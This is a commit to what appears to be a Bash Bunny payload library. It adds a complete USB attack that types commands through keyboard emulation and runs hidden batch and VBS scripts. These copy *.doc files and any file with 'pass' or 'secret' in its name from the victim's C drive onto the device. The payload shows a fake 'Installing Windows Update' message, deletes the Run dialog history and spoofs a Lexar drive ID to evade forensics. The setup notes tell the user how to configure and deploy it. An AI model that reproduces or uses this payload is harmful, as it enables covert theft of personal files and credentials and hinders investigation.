Added SmartFileExtract payload (#296)

payloads/library/exfiltration/SmartFileExtract_Exfiltrator/d.cmd

@@ -0,0 +1,4 @@
+@echo off
+start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell"
+cscript %~dp0\i.vbs %~dp0\e.cmd
+@exit

payloads/library/exfiltration/SmartFileExtract_Exfiltrator/e.cmd

@@ -0,0 +1,25 @@
+REM Setup required:
+REM o Create SFE in the loot directory
+REM o Place SmartFileExtract on the root of the bashbunny
+@echo off
+@echo Installing Windows Update
+
+REM Delete registry keys storing Run dialog history
+REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+
+REM Creates directory compromised of computer name, date and time
+REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
+set dst=%~dp0\..\..\loot\SFE\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
+mkdir %dst% >>nul
+
+
+if Exist %USERPROFILE%\Documents (
+%~dp0\..\..\SmartFileExtract /drive c /file *.doc;*pass*.*;*secret* /copyto %dst% /curtain 3 /maxsec 90 /maxmbs 500 >>nul
+
+)
+
+REM Blink CAPSLOCK key
+start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
+
+@cls
+@exit

payloads/library/exfiltration/SmartFileExtract_Exfiltrator/i.vbs

@@ -0,0 +1 @@
+CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

payloads/library/exfiltration/SmartFileExtract_Exfiltrator/payload.txt

@@ -0,0 +1,29 @@
+#!/bin/bash
+#
+# Title:         ExecutableInstaller
+# Author:        IMcPwn (original)
+# Additions:     SaintCrossbow (only for the parts to run SFE)
+# Version:       1.0
+# Target:        Windows 7+
+#
+# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
+# which in turn executes e.cmd invisibly using i.vbs
+# which in turn copies payload.exe from the root of the Bash Bunny and then executes it
+# using the --startup parameter. Change these settings inside of e.cmd.
+#
+
+# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
+source bunny_helpers.sh
+
+LED R
+# Note: Acting as Lexar Compact Flash Drive to throw off forensics
+ATTACKMODE HID STORAGE VID_0X05DC PID_0X0081
+QUACK DELAY 200
+REM --> Minimize all windows
+QUACK WINDOWS d
+QUACK DELAY 200
+QUACK GUI r
+QUACK DELAY 100
+QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch2\d.cmd')"
+QUACK ENTER
+LED G

payloads/library/exfiltration/SmartFileExtract_Exfiltrator/readme.md

@@ -0,0 +1 @@
+# Exfiltrate using SmartFileExtract Utility

payloads/library/exfiltration/SmartFileExtract_Exfiltrator/setup.txt

@@ -0,0 +1,26 @@
+Method of calling SmartFileExtractor is based on the excellent work of IMcPwn: the ExecutableInstaller.
+See the BashBunny Wiki for the original version.
+
+Setup:
+- Download the SmartFileExtract utility from https://github.com/saintcrossbow/SmartFileExtract
+  * Quick tip: you only need the SmartFileExtract.exe from the project root
+- Copy SmartFileExtract.exe to the root of the bashubunny
+- Change payload.txt:
+  a) Your file volume name for the bashbunny (if necessary) 
+  b) What kind of device you want the bunny to spoof.
+  Note: Very much recommend you do this, otherwise will be picked up by forensics
+- Change e.cmd: 
+  a) Change your options for Smart File Extract here.
+
+The default payload included in this distribution:
+- Looks to Forensics like a Lexar drive (but still called BashBunny)
+- Finds all files with a) the word secret or pass in the filename as well as b) any doc files
+- Reports status as a fake install window
+- Stops extract after 90 seconds or 500 MBs
+
+SmartFileExtract has full documentation on how to use the utility, but if you want to kick the tires and light the fires, run:
+smartfileextract /help
+
+Good luck!
+
+Saint Crossbow